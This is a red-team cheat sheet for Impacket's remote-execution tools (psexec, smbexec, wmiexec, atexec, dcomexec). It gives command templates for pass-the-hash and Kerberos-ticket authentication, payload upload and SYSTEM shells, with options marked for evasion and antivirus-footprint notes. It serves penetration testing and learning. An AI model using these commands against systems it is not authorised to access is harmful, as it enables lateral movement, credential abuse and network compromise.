🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ“¦ Impacket / Impacket β€” Remote Execution

Impacket β€” Remote Execution

Quick Reference

Tool Purpose
psexec.py PSEXEC-like shell via SMB + RemComSvc (SYSTEM)
smbexec.py Semi-interactive shell via service creation, no binary upload
wmiexec.py Semi-interactive shell via WMI, low footprint
atexec.py Single command execution via Task Scheduler
dcomexec.py Semi-interactive shell via DCOM objects

psexec.py

PSEXEC-like functionality using RemComSvc β€” uploads binary, creates service, returns SYSTEM shell.

Syntax:

psexec.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Password auth β€” interactive shell
psexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
psexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> psexec.py -k -no-pass <domain>/<username>@<target>

# AES key
psexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Execute single command
psexec.py <domain>/<username>:<password>@<target> <command>

# Upload and execute custom binary
psexec.py -c /local/path/payload.exe <domain>/<username>:<password>@<target>

# Custom service name (evasion)
psexec.py -service-name <service-name> <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> β€” NTLM hash auth
- -k β€” Kerberos auth via KRB5CCNAME ccache
- -no-pass β€” Skip password prompt (use with -k)
- -aesKey <aes256-key> β€” AES-128 or AES-256 Kerberos key
- -dc-ip <dc-ip> β€” Domain controller IP
- -target-ip <target> β€” Target IP when NetBIOS name can't resolve
- -c <pathname> β€” Upload file for execution; pass args via command
- -path <PATH> β€” Path of the command on target
- -service-name <name> β€” Custom service name for the payload
- -remote-binary-name <name> β€” Name of the uploaded executable
- -codec <codec> β€” Output encoding (default utf-8)
- -port <port> β€” Destination SMB port

Notes:
- Drops a binary on disk β€” most AV-detected
- Returns SYSTEM-level shell
- Requires admin share access (C$, ADMIN$)

smbexec.py

Semi-interactive shell via service creation; output written to a share. No binary uploaded.

Syntax:

smbexec.py [options] <domain>/<username>:<password>@<target>

Common Usage:

# Password auth
smbexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
smbexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> smbexec.py -k -no-pass <domain>/<username>@<target>

# AES key
smbexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# PowerShell shell
smbexec.py -shell-type powershell <domain>/<username>:<password>@<target>

# Use custom share for output
smbexec.py -share <share> <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> β€” NTLM hash auth
- -k β€” Kerberos auth via KRB5CCNAME ccache
- -no-pass β€” Skip password prompt
- -aesKey <aes256-key> β€” AES Kerberos key
- -dc-ip <dc-ip> β€” Domain controller IP
- -target-ip <target> β€” Target IP when name can't resolve
- -share <share> β€” Share to grab output from (default: C$)
- -mode {SERVER,SHARE} β€” SHARE (default) or SERVER (needs root)
- -shell-type {cmd,powershell} β€” Command processor
- -service-name <name> β€” Custom service name

Notes:
- No binary upload β€” lower disk footprint than psexec
- Each command creates/starts/stops/deletes a service

wmiexec.py

Semi-interactive shell using Windows Management Instrumentation. Output written to ADMIN$.

Syntax:

wmiexec.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Password auth β€” interactive shell
wmiexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
wmiexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> wmiexec.py -k -no-pass <domain>/<username>@<target>

# AES key
wmiexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Execute single command (no shell)
wmiexec.py <domain>/<username>:<password>@<target> <command>

# Silent command (no output, no cmd.exe wrapper)
wmiexec.py -silentcommand -nooutput <domain>/<username>:<password>@<target> <command>

# PowerShell shell
wmiexec.py -shell-type powershell <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> β€” NTLM hash auth
- -k β€” Kerberos auth via KRB5CCNAME ccache
- -no-pass β€” Skip password prompt
- -aesKey <aes256-key> β€” AES Kerberos key
- -dc-ip <dc-ip> β€” Domain controller IP
- -target-ip <target> β€” Target IP when name can't resolve
- -share <share> β€” Share for output (default: ADMIN$)
- -nooutput β€” Don't print output (no SMB connection created)
- -silentcommand β€” Run without cmd.exe wrapper (no output)
- -shell-type {cmd,powershell} β€” Command processor
- -com-version MAJOR:MINOR β€” DCOM version override

Notes:
- Runs commands as the authenticated user (not SYSTEM)
- Lower AV footprint than psexec β€” no service creation
- Writes output to a temp file on ADMIN$ then reads it back

atexec.py

Execute a single command via the Task Scheduler (AT) service.

Syntax:

atexec.py [options] <domain>/<username>:<password>@<target> <command>

Common Usage:

# Password auth
atexec.py <domain>/<username>:<password>@<target> <command>

# Pass-the-Hash
atexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target> <command>

# Kerberos (ccache)
KRB5CCNAME=<ticket> atexec.py -k -no-pass <domain>/<username>@<target> <command>

# AES key
atexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target> <command>

# Use existing logon session (no cmd.exe, no output)
atexec.py -session-id <session-id> <domain>/<username>:<password>@<target> <command>

Options:
- -hashes <lm-hash>:<nt-hash> β€” NTLM hash auth
- -k β€” Kerberos auth via KRB5CCNAME ccache
- -no-pass β€” Skip password prompt
- -aesKey <aes256-key> β€” AES Kerberos key
- -dc-ip <dc-ip> β€” Domain controller IP
- -session-id <id> β€” Use existing logon session (no output, no cmd.exe)
- -silentcommand β€” Run without cmd.exe wrapper
- -codec <codec> β€” Output encoding

Notes:
- Single command only β€” no interactive shell
- Runs as SYSTEM via Task Scheduler

dcomexec.py

Semi-interactive shell using DCOM objects (ShellWindows, ShellBrowserWindow, MMC20).

Syntax:

dcomexec.py [options] <domain>/<username>:<password>@<target> [command]

Common Usage:

# Password auth β€” interactive shell (default ShellWindows object)
dcomexec.py <domain>/<username>:<password>@<target>

# Pass-the-Hash
dcomexec.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>

# Kerberos (ccache)
KRB5CCNAME=<ticket> dcomexec.py -k -no-pass <domain>/<username>@<target>

# AES key
dcomexec.py -aesKey <aes256-key> -k -no-pass <domain>/<username>@<target>

# Use MMC20.Application object
dcomexec.py -object MMC20 <domain>/<username>:<password>@<target>

# Single command, no output (evasion)
dcomexec.py -silentcommand -nooutput <domain>/<username>:<password>@<target> <command>

# PowerShell shell
dcomexec.py -shell-type powershell <domain>/<username>:<password>@<target>

Options:
- -hashes <lm-hash>:<nt-hash> β€” NTLM hash auth
- -k β€” Kerberos auth via KRB5CCNAME ccache
- -no-pass β€” Skip password prompt
- -aesKey <aes256-key> β€” AES Kerberos key
- -dc-ip <dc-ip> β€” Domain controller IP
- -object [{ShellWindows,ShellBrowserWindow,MMC20}] β€” DCOM object (default: ShellWindows)
- -share <share> β€” Share for output (default: ADMIN$)
- -nooutput β€” Don't fetch command output
- -silentcommand β€” No cmd.exe wrapper, no output (can't run dir/cd)
- -shell-type {cmd,powershell} β€” Command processor
- -com-version MAJOR:MINOR β€” DCOM version override

Notes:
- Runs as the authenticated user's privilege level
- ShellWindows requires an interactive session on target
- MMC20 works without an interactive session